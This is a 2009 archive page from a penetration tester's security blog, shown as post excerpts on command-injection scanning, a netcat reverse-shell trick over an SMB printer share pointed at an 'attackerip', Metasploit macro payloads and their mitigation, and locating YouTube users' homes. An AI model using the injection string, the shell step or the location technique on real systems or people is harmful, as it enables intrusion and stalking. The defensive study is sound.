

Showing posts from January, 2009

Welcome to Mark Baggett - In Depth Defense

I am the course author of SANS SEC573, Automating Information Security with Python. Check back frequently for updated tools and articles related to course material.

Senior SANS Instructor
GSE #15
Internet Storm Center Handler
Penetration Testing and Incident Response Consultant
Technical Advisor to DoD for The SANS Institute
Founding President of the Greater Augusta ISSA
Cofounder of BSidesAugusta Security Conference

FREQ SERVER - Tool and technique for detecting Malware Command and Control domains
DOMAIN_STATES - Tool for detecting "Baby Domains" used for phishing and Malware distribution
SRUM_DUMP - Forensics tool for extracting System Resource Utilization Monitoring artifacts
LIAM_NEESON - Proof of Concept Linux Hash Protection
HONEY_HASHES - Certainly honey tokens have been around since 2003, but I created a cool technique for creating fake SATs in memory that was turned into the Dell SecureWorks DCEPT framework.
VSSOWN - Tool & Technique for Using Microsoft Volume Shadow Copies for hiding malware and extracting artifacts
SDB Hacking - Using Application Compatibility in unexpected ways.
SET-KBLED - Utility for Managing Clevo and Sager Laptop LED Backlit Keyboards - Scapy based fragment reassembly engine - A password cracker for the EAP protocol

and more. Most of these tools are available on my github page. Follow me on twitter @markbaggett

I know where you live... or at least google does

Can you use YouTube to find out where a video was uploaded? I'm not saying you can. I'm not saying you can't. But I think it is interesting to try. Using the following method, YouTube has led me to the homes of a few people I know. Does it work for you?

Start with YouTube's "Advanced Search".

Click "Advanced Options" and "Show Map". Type in the userid of the person you're trying to locate and click the SEARCH box inside the advanced search box (not the one at the top). If the video is in the circle it will be displayed in the result. If not, you will see "No Videos found for xyz" and a playlist for the user you are searching for. The difference between a hit and a no-hit is subtle. Do a search for something you know is geoencoded so you can see the difference. As a rule, if you see this then the video is not in the circle:

No videos found for “USERXYZ”
Playlist Results for USERXYZ

Zoom in one click at a time making your circle smal…

WebInspect and Arbitrary Command Execution

I won't be the first to say it, but it's worth repeating: no scanner is a substitute for a human penetration test. That said, I find that WebInspect saves me a lot of time and often either finds vulnerabilities for me or, just as often, generates error messages that lead me to finding issues pretty quickly. I like to think of it as a web app fuzzer on steroids. Here is a custom signature I've added to help me cover my bases.
When WebInspect scans for arbitrary command execution, it will only detect the flaw when the results of the command execution are returned to the browser. For example, it will inject "; id" into all the fields on a page. If it doesn't see "uid=0(root) " (or preferably the uid of a less privileged apache httpd user) returned from the web server somewhere in that response, then it doesn't detect the vulnerability. But the web server very well may have executed the code invisibly. Consider this example:
A website has a…

Today is a good day!

First I learned via Wesley McGrew's website that I won Ed Skoudis' December hacking challenge. When I look at the list of people who submitted answers, I feel really good to be included in that list of "notable security studs". Thanks to Ed for putting together a fun challenge. I always learn a lot any time I do anything related to Jedi Master Skoudo.
Challenge results

THEN I see this entry on Wesley's blog on pretending to be a printer with netcat. It occurs to me that this is the other end of my netcat w/o netcat shell shoveling attempts I blogged about back in April 08. Using that technique I was able to shovel command output to netcat running on an arbitrary port. But I really want a bidirectional interactive shell. The thought is this.
1) Share a netcat listener on my linux box over SMB.
2) That netcat printer share must be a BIDIRECTIONAL printer and not be spooled.
3) Net use lpt1 \\attackerip\netcatshare
4) lpt1 (The 16 bit p…

Infeasibility of Modeling Polymorphic Shellcode

This is a very interesting paper from some smart people at Columbia University. Here is my layman's summary for the terminally lazy:

Intro (paraphrase):
We are going to model the feasibility of modeling polymorphic shellcode to see if we can rely on antivirus heuristics and behavioral detection techniques.

Body (paraphrase):
Examine a ton of models & do some math that makes my head hurt.

"Our empirical results demonstrate the difficulty of modeling polymorphic behavior. We briefly summarized the achievements of the shellcoder community in making their code polymorphic and examined ways to improve some of these techniques. We presented analytical methods that can help assess the capabilities of polymorphic engines and applied them to some state-of-the-art engines. We explained why signature–based modeling works in some cases and confirmed that the viability of such approaches matches the intuitive belief that polymorphism will eventually defeat these methodologies.…

Door Schedule Fail

Huh?  I see this sign frequently.  So I went ahead and figured it out.  The diagram below reveals the door schedule.  I assigned a number to each of the times the door is closed, 1=9:30 pm - 4:00 am ; 2 = Monday - Friday; 3= 9:30 pm  etc..  So I guess they only unlock the stair wells on weekends when no one is in the office.  Must be a security measure.  :)
Time              Sat, Sun   Mon        Tues-Thurs   Friday    Holidays
00:00am-04:00am   1          1,2,5      1,2          1,2,4     1,6
4:01-9:29pm       OPEN       2,5        2            2         6
9:30pm            1,3        1,2,3,5    1,2,3        1,2,3     1,3,6
9:31pm-11:59pm    1          1,2,5      1,2          1,2       1,6

Metasploit Visual Basic Payloads in action

John Strand turned me on to this at CDI in December. We were talking about my presentation on the effectiveness of antivirus in detecting metasploit payloads and he asked if I had done any testing on the visual basic payloads. At the time I had not, but now I have to agree with John's assertion that this is potentially a very scary and powerful feature. Metasploit payloads can easily be embedded in Microsoft Office documents and, as you might expect if you've read my previous blogs, antivirus software does not detect the payloads. I made a video to demonstrate the creation and use of the payloads.

To mitigate these attacks you can use Group Policy to set your Office document macro security to HIGH. You could use the Medium setting if you work for that mythical company where users don't ignore security warnings. Here are some helpful links:

Setting Macro Levels
Office Group Policy Templates

Or click here to check it out!

Who would you trust?

There is no shortage of stories about infected digital picture frames out there. The SANS Internet Storm Center has had several posts on the subject. When Santa brought my daughter a Sakar "Portable Digital Picture Frame" I was sure to scan it with some antivirus software. Sure enough, McAfee reports a Trojan exists on the device. I checked the manufacturer's support page and found this note on the Product FAQ:
"Does my product have a virus? No. It has come to our attention that some versions of McAfee Antivirus are warning users about a potential virus in one of our files. We have confirmed that this is a false positive. There is no virus and users can install and use their frame without any fear of a virus infection. To avoid any installation issues, we suggest McAfee be temporarily suspended during installation and use. Users of Symantec and other antivirus products are not affected."
Other antivirus products are not affected.  It must just be a McAfee …